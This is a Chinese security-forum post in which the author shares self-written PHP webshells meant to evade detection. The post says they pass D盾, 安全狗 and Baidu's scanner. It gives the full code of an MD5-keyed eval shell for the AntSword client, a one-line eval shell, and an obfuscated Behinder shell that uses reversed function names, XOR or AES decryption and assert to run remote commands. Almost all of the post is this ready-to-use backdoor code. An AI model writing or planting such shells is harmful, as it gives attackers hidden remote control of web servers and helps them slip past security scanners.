php webshell bypass 小马-思路分享社区-Web安全-赤道学院

php webshell bypass 小马

自己写了几个webshell,博君一笑。
目前过D盾,安全狗,百度
不过shellpub(河马)。

经测试,兼容php5.4-7.3版本,使用蚁剑可正常连接

由于蚁剑的连接机制,无法在蚁剑客户端中增加post数据包

Image description

直奔主题

<?php
if($_POST){$array = $_POST;}
$a="7a4912";//密码为32位md5的后6位,默认aa
$k = array_keys($array)[0];
$v = substr(md5($k),26);

if ($v != $a){die();}

class Php
{
  function __construct($content,$data = []){
          $this->content = $content;
          $b = $this->content;
         eval('$a = "" ;' . $b . '');
        }
}

$aac = new Php($array[$k]);
 

2022年6月10日更新:修复蚁剑虽然显示连接成功,但无法操作的问题
另增:一句话过D盾安全狗

<? $array = $_POST; $a = "aa"; $c = $array[$a]; $b =  str_replace("acev","acev",$c); eval('$a = "" ;'.$b.'$c = "" ;');
 

也不藏着掖着,再分享一个冰蝎马,经测试,php 5.3 – 7.3 版本可正常运行

<?php
@error_reporting(0);
session_start();
    $k="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
  $_SESSION['k']=$k;
  session_write_close();

$i = "contents";
$f = "file_get_{$i}";
$tsop=$f("php://input");

$o = "openssl";
  if(!extension_loaded($o))
  {
    $tt = "edoced";
    $t="base64_".$tt;
    $tsop=$t($tsop."");
    
    for($i=0;$i<strlen($tsop);$i++) {
            $dc = $tsop[$i]^$k[$i+1&15]; 
            $tsop[$i] = $dc;
          }
  }
  else
  {
    $tsop=openssl_decrypt($tsop, "AES128", $k);
  }
    $rra=explode('|',$tsop);
    $cnuf=$rra[0];
    $smarap=$rra[1];

  class CACCC{
         function __invoke($p) {
        assert("/*aaaacc?>:\"cc*/".NULL.$p.NULL."");
      }
  }

  $obj = new CACCC;
    @$obj($smarap);
?>
请登录后发表评论

    没有回复内容